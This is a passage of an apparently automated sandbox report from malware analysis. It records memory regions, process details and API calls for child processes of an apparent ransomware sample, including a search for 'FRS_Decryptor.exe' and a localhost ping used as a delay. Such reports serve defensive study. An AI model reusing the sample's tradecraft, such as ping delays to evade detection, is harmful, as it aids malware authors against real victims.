0x0 region_type = private name = "private_0x000000007ed5d000" filename = "" Region: id = 3089 start_va = 0x7ee87000 end_va = 0x7ee89fff entry_point = 0x0 region_type = private name = "private_0x000000007ee87000" filename = "" Thread: id = 182 os_tid = 0xabc Thread: id = 184 os_tid = 0xb24 Thread: id = 185 os_tid = 0xb0c Thread: id = 186 os_tid = 0xb4c Process: id = "56" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0xc20f000" os_pid = "0xafc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "54" os_parent_pid = "0xaec" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2986 start_va = 0x650000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 2987 start_va = 0x670000 end_va = 0x671fff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 2988 start_va = 0x680000 end_va = 0x68efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 2989 start_va = 0x690000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2990 start_va = 0x6d0000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 2991 start_va = 0x710000 end_va = 0x713fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 2992 start_va = 0x720000 end_va = 0x720fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 2993 start_va = 0x730000 end_va = 0x731fff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 2994 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 2995 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2996 start_va = 0x7f1f0000 end_va = 0x7f212fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f1f0000" filename = "" Region: id = 2997 start_va = 0x7f215000 end_va = 0x7f215fff entry_point = 0x0 region_type = private name = "private_0x000000007f215000" filename = "" Region: id = 2998 start_va = 0x7f219000 end_va = 0x7f219fff entry_point = 0x0 region_type = private name = "private_0x000000007f219000" filename = "" Region: id = 2999 start_va = 0x7f21d000 end_va = 0x7f21ffff entry_point = 0x0 region_type = private name = "private_0x000000007f21d000" filename = "" Region: id = 3000 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3001 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3002 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3003 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3008 start_va = 0x740000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 3009 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3010 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3011 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3012 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 3013 start_va = 0x750000 end_va = 0x7cdfff entry_point = 0x750000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3014 start_va = 0x830000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 3015 start_va = 0xae0000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 3016 start_va = 0x73500000 end_va = 0x73520fff entry_point = 0x73500000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 3017 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3018 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3019 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3020 start_va = 0x7f0f0000 end_va = 0x7f1effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f0f0000" filename = "" Region: id = 3073 start_va = 0x660000 end_va = 0x663fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 3074 start_va = 0x670000 end_va = 0x673fff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 3075 start_va = 0x73410000 end_va = 0x7341efff entry_point = 0x73410000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Thread: id = 183 os_tid = 0x3d4 Process: id = "57" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x11b55000" os_pid = "0xb48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3090 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 3091 start_va = 0xef0000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 3092 start_va = 0xf10000 end_va = 0xf11fff entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 3093 start_va = 0xf20000 end_va = 0xf2efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f20000" filename = "" Region: id = 3094 start_va = 0xf30000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 3095 start_va = 0xf70000 end_va = 0xfaffff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 3096 start_va = 0xfb0000 end_va = 0xfb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fb0000" filename = "" Region: id = 3097 start_va = 0xfc0000 end_va = 0xfc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fc0000" filename = "" Region: id = 3098 start_va = 0xfd0000 end_va = 0xfd1fff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 3099 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3100 start_va = 0x7f480000 end_va = 0x7f4a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f480000" filename = "" Region: id = 3101 start_va = 0x7f4a9000 end_va = 0x7f4a9fff entry_point = 0x0 region_type = private name = "private_0x000000007f4a9000" filename = "" Region: id = 3102 start_va = 0x7f4aa000 end_va = 0x7f4acfff entry_point = 0x0 region_type = private name = "private_0x000000007f4aa000" filename = "" Region: id = 3103 start_va = 0x7f4ad000 end_va = 0x7f4adfff entry_point = 0x0 region_type = private name = "private_0x000000007f4ad000" filename = "" Region: id = 3104 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3105 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3106 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3107 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3108 start_va = 0x10c0000 end_va = 0x10cffff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 3109 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3110 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3111 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3112 start_va = 0xef0000 end_va = 0xefffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ef0000" filename = "" Region: id = 3113 start_va = 0xf00000 end_va = 0xf03fff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 3114 start_va = 0xfe0000 end_va = 0x105dfff entry_point = 0xfe0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3115 start_va = 0x1220000 end_va = 0x131ffff entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 3116 start_va = 0x14b0000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 3117 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 3118 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3119 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3120 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3121 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3122 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3123 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3124 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3125 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3126 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3127 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3128 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3129 start_va = 0x7f380000 end_va = 0x7f47ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f380000" filename = "" Region: id = 3130 start_va = 0x1060000 end_va = 0x109ffff entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 3131 start_va = 0x10d0000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 3132 start_va = 0x7f4a6000 end_va = 0x7f4a8fff entry_point = 0x0 region_type = private name = "private_0x000000007f4a6000" filename = "" Region: id = 3133 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 3134 start_va = 0xf10000 end_va = 0xf12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f10000" filename = "" Region: id = 3135 start_va = 0x10a0000 end_va = 0x10a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010a0000" filename = "" Region: id = 3136 start_va = 0x10b0000 end_va = 0x10b2fff entry_point = 0x10b0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 3137 start_va = 0x1110000 end_va = 0x114ffff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 3138 start_va = 0x1150000 end_va = 0x118ffff entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 3139 start_va = 0x7f4a3000 end_va = 0x7f4a5fff entry_point = 0x0 region_type = private name = "private_0x000000007f4a3000" filename = "" Thread: id = 187 os_tid = 0xb54 [0075.947] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0075.947] __set_app_type (_Type=0x1) [0075.947] __p__fmode () returned 0x76ea1768 [0075.947] __p__commode () returned 0x76ea176c [0075.947] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0075.947] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0075.947] SetThreadUILanguage (LangId=0x0) returned 0x409 [0075.949] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0075.949] _fileno (_File=0x76ea4c28) returned 1 [0075.949] _get_osfhandle (_FileHandle=1) returned 0x28 [0075.949] GetFileType (hFile=0x28) returned 0x2 [0075.949] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfaf378 | out: lpMode=0xfaf378) returned 0 [0075.949] GetLastError () returned 0x6 [0075.949] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfaf2dc, nSize=0x50 | out: lpBuffer="䤐Ģ") returned 0x0 [0075.949] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0075.951] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xfaf394 | out: phkResult=0xfaf394*=0x88) returned 0x0 [0075.951] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xfaf388, lpData=0xfaf390, lpcbData=0xfaf38c*=0x4 | out: lpType=0xfaf388*=0x0, lpData=0xfaf390*=0x0, lpcbData=0xfaf38c*=0x4) returned 0x2 [0075.951] RegCloseKey (hKey=0x88) returned 0x0 [0075.951] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0xfaf358*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xfaf394 | out: ppResult=0xfaf394*=0x122c3e0*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x1228a48*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0075.951] FreeAddrInfoW (pAddrInfo=0x122c3e0*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x1228a48*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0075.951] IcmpCreateFile () returned 0x1226a30 [0075.954] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x122c138 [0075.954] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x1235270 [0075.954] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xfaf490, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0075.955] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0xfaf388, nSize=0x0, Arguments=0xfaf384 | out: lpBuffer="竈ģﵜú┗\x94䰨盪❋") returned 0x14 [0075.956] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.956] _fileno (_File=0x76ea4c28) returned 1 [0075.956] _get_osfhandle (_FileHandle=1) returned 0x28 [0075.956] GetFileType (hFile=0x28) returned 0x2 [0075.956] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfaf34c | out: lpMode=0xfaf34c) returned 0 [0075.956] GetLastError () returned 0x6 [0075.956] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfaf2b0, nSize=0x50 | out: lpBuffer="ú❋") returned 0x0 [0075.956] _fileno (_File=0x76ea4c28) returned 1 [0075.956] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0075.956] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0075.956] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x1237b00 [0075.956] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x1237b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0075.956] _fileno (_File=0x76ea4c28) returned 1 [0075.956] _write (in: _FileHandle=1, _Buf=0x1237b00*, _MaxCharCount=0x14 | out: _Buf=0x1237b00*) returned 20 [0075.956] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.956] _fileno (_File=0x76ea4c28) returned 1 [0075.956] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0075.957] LocalFree (hMem=0x1237b00) returned 0x0 [0075.957] LocalFree (hMem=0x1237ac8) returned 0x0 [0075.957] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xfaf388, nSize=0x0, Arguments=0xfaf384 | out: lpBuffer="竈ģﵜú▪\x94䰨盪❚") returned 0x18 [0075.957] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.957] _fileno (_File=0x76ea4c28) returned 1 [0075.957] _get_osfhandle (_FileHandle=1) returned 0x28 [0075.957] GetFileType (hFile=0x28) returned 0x2 [0075.957] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfaf34c | out: lpMode=0xfaf34c) returned 0 [0075.957] GetLastError () returned 0x6 [0075.957] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfaf2b0, nSize=0x50 | out: lpBuffer="ú❚") returned 0x0 [0075.957] _fileno (_File=0x76ea4c28) returned 1 [0075.957] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0075.957] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0075.957] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x122c1b0 [0075.957] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x122c1b0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0075.957] _fileno (_File=0x76ea4c28) returned 1 [0075.957] _write (in: _FileHandle=1, _Buf=0x122c1b0*, _MaxCharCount=0x18 | out: _Buf=0x122c1b0*) returned 24 [0075.957] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.957] _fileno (_File=0x76ea4c28) returned 1 [0075.957] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0075.957] LocalFree (hMem=0x122c1b0) returned 0x0 [0075.957] LocalFree (hMem=0x1237ac8) returned 0x0 [0075.957] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0075.957] IcmpSendEcho2Ex (in: IcmpHandle=0x1226a30, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x122c138, RequestSize=0x20, RequestOptions=0xfaf404, ReplyBuffer=0x1235270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x1235270) returned 0x1 [0075.958] InetNtopW (in: Family=2, pAddr=0xfaf3f4, pStringBuf=0xfaf51c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0075.958] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xfaf388, nSize=0x0, Arguments=0xfaf384 | out: lpBuffer="笈ģﵜú⛔\x94䰨盪✣") returned 0x16 [0075.958] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.958] _fileno (_File=0x76ea4c28) returned 1 [0075.958] _get_osfhandle (_FileHandle=1) returned 0x28 [0075.958] GetFileType (hFile=0x28) returned 0x2 [0075.958] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfaf34c | out: lpMode=0xfaf34c) returned 0 [0075.958] GetLastError () returned 0x6 [0075.958] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfaf2b0, nSize=0x50 | out: lpBuffer="ú✣") returned 0x0 [0075.958] _fileno (_File=0x76ea4c28) returned 1 [0075.958] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0075.958] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0075.958] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x1237b40 [0075.958] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x1237b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0075.958] _fileno (_File=0x76ea4c28) returned 1 [0075.958] _write (in: _FileHandle=1, _Buf=0x1237b40*, _MaxCharCount=0x16 | out: _Buf=0x1237b40*) returned 22 [0075.958] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.958] _fileno (_File=0x76ea4c28) returned 1 [0075.958] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0075.958] LocalFree (hMem=0x1237b40) returned 0x0 [0075.958] LocalFree (hMem=0x1237b08) returned 0x0 [0075.958] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xfaf388, nSize=0x0, Arguments=0xfaf384 | out: lpBuffer="笈ģﵜú⛿\x94䰨盪✼") returned 0x9 [0075.958] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.958] _fileno (_File=0x76ea4c28) returned 1 [0075.958] _get_osfhandle (_FileHandle=1) returned 0x28 [0075.958] GetFileType (hFile=0x28) returned 0x2 [0075.958] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfaf34c | out: lpMode=0xfaf34c) returned 0 [0075.958] GetLastError () returned 0x6 [0075.958] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfaf2b0, nSize=0x50 | out: lpBuffer="ú✼") returned 0x0 [0075.959] _fileno (_File=0x76ea4c28) returned 1 [0075.959] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0075.959] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.959] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1228a78 [0075.959] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x1228a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 